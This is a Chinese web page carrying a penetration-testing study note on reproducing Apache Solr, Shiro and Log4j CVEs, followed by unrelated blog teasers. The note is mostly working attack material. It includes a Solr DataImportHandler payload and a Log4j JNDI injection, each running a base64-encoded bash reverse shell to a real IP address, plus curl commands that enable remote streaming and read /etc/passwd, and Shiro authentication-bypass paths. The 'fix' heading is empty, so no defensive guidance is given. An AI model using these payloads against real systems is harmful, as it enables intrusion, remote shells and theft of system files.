当前位置：首页 > news >正文

Day82：服务攻防-开发组件安全Solr搜索Shiro身份Log4j日志本地CVE环境复现

news 2026/5/14 9:41:01

J2EE-组件Solr-本地demo&CVE

命令执行（CVE-2019-17558）

远程命令执行漏洞(CVE-2019-0193)

Apache Solr 文件读取&SSRF (CVE-2021-27905)

J2EE-组件Shiro-本地demo&CVE

CVE_2016_4437 Shiro-550+Shiro-721(RCE)

CVE-2020-11989(身份认证绕过)

CVE-2020-1957(身份认证绕过)

CVE-2022-32532(身份验证绕过)

J2EE-组件Log4j-本地demo&CVE

Log4j2远程命令执行（CVE-2021-44228）

知识点：

1、J2EE-组件安全-Solr-全文搜索

2、J2EE-组件安全-Shiro-身份验证

3、J2EE-组件安全-Log4J-日志记录

常见语言开发框架：

PHP：Thinkphp Laravel YII CodeIgniter CakePHP Zend等
JAVA：Spring MyBatis Hibernate Struts2 Springboot等
Python：Django Flask Bottle Turbobars Tornado Web2py等
Javascript：Vue.js Node.js Bootstrap JQuery Angular等

常见语言开发组件：(Java)：Apache Solr、Apache Shiro、Apache Struts2、Apache Flink、Flume、Dubbo、Redis、Logstash、ElasticSearch、Kafka、Ghidra、Minecraft、Apache hive、Datax、Streaming、Dolphin Scheduler、Storm、Spring、Aibaba FastJson、Jackson、Log4J、XSteam等。

J2EE-组件Solr-本地demo&CVE

主要基于HTTP和Apache Lucene实现的全文搜索服务器。

黑盒特征：图标及端口8983

命令执行（CVE-2019-17558）

影响版本：Apache Solr 5.0.0版本至8.3.1

利用项目：https://github.com/jas502n/solr_rce

D:\Python27\python.exe solr_rce.py http://123.58.236.76:50847 id

远程命令执行漏洞(CVE-2019-0193)

影响版本：Apache Solr < 8.2.0版本

https://vulhub.org/#/environments/solr/CVE-2019-0193/

条件1：Apache Solr的DataImportHandler启用了模块DataImportHandler(默认不会被启用)

条件2：Solr Admin UI未开启鉴权认证。（默认情况无需任何认证）

选择已有核心后选择Dataimport功能并选择debug模式，更改填入以下POC，点击Execute with this Confuguration

<dataConfig><dataSource type="URLDataSource"/><script><![CDATA[function poc(){ java.lang.Runtime.getRuntime().exec("bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC80Ny45NC4yMzYuMTE3LzU1NjYgMD4mMQ==}|{base64,-d}|{bash,-i}");}]]></script><document><entity name="stackoverflow"url="https://stackoverflow.com/feeds/tag/solr"processor="XPathEntityProcessor"forEach="/feed"transformer="script:poc" /></document>
</dataConfig>

Apache Solr 文件读取&SSRF (CVE-2021-27905)

全版本官方拒绝修复漏洞

获取数据库名

http://47.94.236.117:8983/solr/admin/cores?indexInfo=false&wt=json

访问触发

curl -i -s -k -X $'POST' \-H $'Content-Type: application/json' --data-binary $'{\"set-property\":{\"requestDispatcher.requestParsers.enableRemoteStreaming\":true}}' \$'http://47.94.236.117:8983/solr/demo/config'

任意文件读取

curl -i -s -k 'http://47.94.236.117:8983/solr/demo/debug/dump?param=ContentStreams&stream.url=file:///etc/passwd'

J2EE-组件Shiro-本地demo&CVE

Java安全框架，能够用于身份验证、授权、加密和会话管理。

黑盒特征：数据包cookie里面rememberMe

白盒审计：看调用的shiro库对应版本是否爆过漏洞

CVE_2016_4437 Shiro-550+Shiro-721(RCE)

影响范围：Apache Shiro <= 1.2.4

工具直接搜哈

CVE-2020-11989(身份认证绕过)

Poc：/admin/%20

影响范围：Apache Shiro < 1.7.1

CVE-2020-1957(身份认证绕过)

Poc：/xxx/..;/admin/

影响范围：Apache Shiro < 1.5.3

CVE-2022-32532(身份验证绕过)

Poc： /permit/any

/permit/a%0any可绕过，需要依赖代码具体写法，无法自动化，风险较低。

影响范围：Apache Shiro < 1.9.1

J2EE-组件Log4j-本地demo&CVE

Apache的一个开源项目，是一个基于Java的日志记录框架。

黑盒特征：盲打会问蓝队攻击特征（${jndi:rmi:///osutj8}）

Log4j2远程命令执行（CVE-2021-44228）

漏洞影响的产品版本包括：Apache Log4j2 2.0 - 2.15.0-rc1

修复

生成反弹Shell的JNDI注入

java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC80Ny45NC4yMzYuMTE3Lzk5MDAgMD4mMQ==}|{base64,-d}|{bash,-i}" -A 47.94.236.117

构造JNDI注入Payload提交

${jndi:rmi://47.94.236.117:1099/osutj8}

%24%7b%6a%6e%64%69%3a%72%6d%69%3a%2f%2f%34%37%2e%39%34%2e%32%33%36%2e%31%31%37%3a%31%30%39%39%2f%6f%73%75%74%6a%38%7d

Day82：服务攻防-开发组件安全Solr搜索Shiro身份Log4j日志本地CVE环境复现

目录 J2EE-组件Solr-本地demo&CVE 命令执行（CVE-2019-17558） 远程命令执行漏洞(CVE-2019-0193) Apache Solr 文件读取&SSRF (CVE-2021-27905) J2EE-组件Shiro-本地demo&CVE CVE_2016_4437 Shiro-550Shiro-721(RCE) CVE-2020-11989(身…...

编程日记 2024/4/6 6:10:01

网络协议——VRRP（虚拟路由冗余协议）原理与配置

1. VRRP概述单网关出现故障后下联业务中断，配置两个及以上的网关时由于IP地址冲突，导致通讯时断时续甚至通信中断。VRRP组播类的网络层协议 2. 协议版本 VRRP v2: 支持认证,仅适用于IPv4网络 VRRP v3: 不支持认证， 适用于IPv4和IPv6两种网…...

编程日记 2024/4/6 6:09:00

Elasticsearch：我们如何演化处理二进制文档格式

作者：来自 Elastic Sean Story 从二进制文件中提取内容是一个常见的用例。一些 PDF 文件可能非常庞大 — 考虑到几 GB 甚至更多。Elastic 在处理此类文档方面已经取得了长足的进步，今天，我们很高兴地介绍我们的新工具 —— 数据提取服务&…...

编程日记 2024/4/6 6:06:58

第八讲 Sort Aggregate 算法

我们现在将讨论如何使用迄今为止讨论过的 DBMS 组件来执行查询。 1 查询计划【Query Plan】我们首先来看当一个查询【Query】被解析【Parsed】后会发生什么？ 当 SQL 查询被提供给数据库执行引擎，它将通过语法解析器进行检查，然后它会被转换…...

编程日记 2024/4/6 6:02:55

clickhouse MPPDB数据库--新特性使用示例

clickhouse 新特性： 从clickhouse 22.3至最新的版本24.3.2.23，clickhouse在快速发展中，每个版本都增加了一些新的特性，在数据写入、查询方面都有性能加速。本文根据clickhouse blog中的clickhouse release blog中，学…...

编程日记 2024/4/6 6:01:52

MATLAB多级分组绘图及图例等细节处理； MATLAB画图横轴时间纵轴数值按照不同sensorCode分组画不同sensorCode的曲线

平时研究需要大量的绘图Excel有时候又臃肿且麻烦尤其是当处理大量数据时可能会拖死Windows 示例代码及数据量展示因为数据量是万级别的折线图也变成"柱状图"了, 不过还能看出大致趋势! 横轴是时间纵轴是传感器数值图例是传感器所在深度 % data readtable(C:\U…...

编程日记 2024/4/6 6:00:51

20240405，数据类型，运算符，程序流程结构

是我深夜爆炸，不能再去补救C了，真的来不及了，不能再三天打鱼两天晒网了，真的来不及了呜呜呜呜我实在是不知道看什么课，那黑马吧……MOOC的北邮的C正在进行呜呜 #include <iostream> using namespace std; int…...

编程日记 2024/4/6 5:57:48

Prometheus+grafana环境搭建Nginx(docker+二进制两种方式安装)(六)

由于所有组件写一篇幅过长，所以每个组件分一篇方便查看，前五篇链接如下 Prometheusgrafana环境搭建方法及流程两种方式(docker和源码包)(一)-CSDN博客 Prometheusgrafana环境搭建rabbitmq(docker二进制两种方式安装)(二)-CSDN博客 Prometheusgrafana环…...

编程日记 2024/4/6 5:55:47

贝叶斯逻辑回归

贝叶斯逻辑回归（Bayesian Logistic Regression）是一种机器学习算法，用于解决分类问题。它基于贝叶斯定理，通过建立一个逻辑回归模型，结合先验概率和后验概率，对数据进行分类。贝叶斯逻辑回归的基本原理是…...

编程日记 2024/4/6 5:54:46

Win10 下 Vision Mamba（Vim-main）的环境配置（libcuda.so文件无法找到，windows系统运行失败）

目录 1、下载NVIDIA 驱动程序、cuda11.8、cudnn8.6.0 2、在Anaconda中创建环境并激活 3、下载gpu版本的torch 4、配置环境所需要的包 5、安装causal_conv1d和mamba-1p1p1 安装causal_conv1d 安装mamba-1p1p1 6、运行main.py失败请直接拉到最后查看运行失败的原因&am…...

编程日记 2024/4/6 5:52:43

4 万字全面掌握数据库、数据仓库、数据集市、数据湖、数据中台

如今，随着诸如互联网以及物联网等技术的不断发展，越来越多的数据被生产出来-据统计，每天大约有超过2.5亿亿字节的各种各样数据产生。这些数据需要被存储起来并且能够被方便的分析和利用。随着大数据技术的不断更新和迭代，数据管…...

编程日记 2024/4/6 5:47:38

Leetcode 64. 最小路径和

心路历程： 第一反应像是一个回溯问题，但是看到题目中要求最值，大概率是一道DP问题。并且这里面的递推关系也很明显。这里面边界条件可以有多种处理方法。解法：动态规划 class Solution:def minPathSum(self, grid: List[List…...

编程日记 2024/4/6 5:45:35

FANUC机器人故障诊断—报警代码更新（三）

FANUC机器人故障诊断中，有些报警代码，继续更新如下。一、报警代码（SRVO-348） SRVO-348DCS MCC关闭报警a，b [原因]向电磁接触器发出了关闭指令，而电磁接触器尚未关闭。 [对策] 1.当急停单元上连接了CRMA…...

编程日记 2024/4/6 5:43:33

mysql 本地电脑服务部署

前提： 下载mysql 新建配置文档在安装mysql目录新建 my.ini [mysqld] # 设置3306端口 port3306#设置mysql的安装目录 basedirC:\Program Files\MySQL\MySQL Server 8.3 #切记此处一定要用双斜杠\\,单斜杠我这里会出错，不过看别人的教程，有…...

编程日记 2024/4/6 5:42:32

爬虫学习第一天

爬虫-1 爬虫学习第一天1、什么是爬虫2、爬虫的工作原理3、爬虫核心4、爬虫的合法性5、爬虫框架6、爬虫的挑战7、难点8、反爬手段8.1、Robots协议8.2、检查 User-Agent8.3、ip限制8.4、SESSION访问限制8.5、验证码8.6、数据动态加载8.7、数据加密-使用加密算法 9、用python学习爬…...

编程日记 2024/4/6 5:40:29

labview如何创建2D多曲线XY图和3D图

1如何使用labview创建2D多曲线图使用“索引与捆绑簇数组”函数将多个一维数组捆绑成一个簇的数组，然后将结果赋值给XY图，这样一个多曲线XY图就生成了。也可以自己去手动索引，手动捆绑并生成数组，结果是一样的 2.如何创建3D图在…...

编程日记 2024/4/6 5:39:28

【华为OD机试】芯片资源限制（贪心算法—JavaPythonC++JS实现）

本文收录于专栏：算法之翼本专栏所有题目均包含优质解题思路，高质量解题代码(Java&Python&C++&JS分别实现)，详细代码讲解，助你深入学习，深度掌握！文章目录一. 题目-芯片资源限制二.解题思路三.题解代码Python题解代码JAVA题解代码C/C++题解代码JS题解代码四…...

编程日记 2024/4/6 5:38:26

服务器硬件构成与性能要点：CPU、内存、硬盘、RAID、网络接口卡等关键组件的基础知识总结

文章目录服务器硬件基础知识CPU（中央处理器）内存（RAM）硬盘RAID（磁盘阵列）网络接口卡（NIC）电源散热器主板显卡光驱服务器硬件基础知识服务器是一种高性能计算机，用于在…...

编程日记 2024/4/6 5:37:24

STC89C51学习笔记（四）

STC89C51学习笔记（四） 综述：本文讲述了在STC89C51中数码管、模块化编程、LCD1602的使用。一、数码管 1.数码管显示原理位选：对74HC138芯片的输入端的配置（P22、P23、P24），来选择实现位选&…...

编程日记 2024/4/6 5:33:21

Arcgis Pro地理配准

目录一、目的二、配准 1、找到配准工具 2、添加控制点 3、选择控制点 4、添加更多控制点 5、配准完成、保存三、附录 1、查看控制点或删除控制点 2、效果不好怎么办一、目的下面我们将两张地图进行配准，其中一张有地理位置，而另外一张没…...

编程日记 2024/4/6 5:32:20

Cursor编辑器使用统计工具：量化开发效率与AI辅助深度分析

1. 项目概述：一个为开发者量身定制的Cursor使用统计工具如果你和我一样，日常开发重度依赖Cursor这款AI代码编辑器，那你肯定也好奇过：我到底有多“卷”？每天在编辑器里花了多少时间？最常用的功能是哪些&…...

编程新知 2026/5/14 9:01:27

AMD Ryzen调试神器：SMU Debug Tool完整指南，轻松掌握CPU性能调优

AMD Ryzen调试神器：SMU Debug Tool完整指南，轻松掌握CPU性能调优【免费下载链接】SMUDebugTool A dedicated tool to help write/read various parameters of Ryzen-based systems, such as manual overclock, SMU, PCI, CPUID, MSR and Power Table. …...

编程新知 2026/5/14 8:47:36

《机密计算破局政务金融、截图工具漏洞泄露NTLM哈希、智能体仿冒日增200+：AI安全的三场“攻防战”》

一、全链路机密计算破局：政务/金融敏感数据进入“可信推理”时代当前，大模型落地过程中面临的核心矛盾在于：越是高价值的专业技术领域，其训练数据和实时推理数据的安全级别就越高。在政务场景中，政府规划、财政数据、内…...

编程新知 2026/5/14 8:20:09

Windows 一键部署 OpenClaw 教程｜5 分钟搭建本地 AI 智能体，轻松搞定复杂配置

OpenClaw 2.7.1 接入阿里云百炼超详细图文教程 📋 前置准备本地已安装并能正常运行 OpenClaw 2.7.1 WindowsOpenClaw 顶部 Gateway 保持在线状态拥有可正常登录的阿里云账号网络可正常访问阿里云百炼控制台： https://bailian.console.aliyun.com/cn-be…...

编程新知 2026/5/14 7:53:24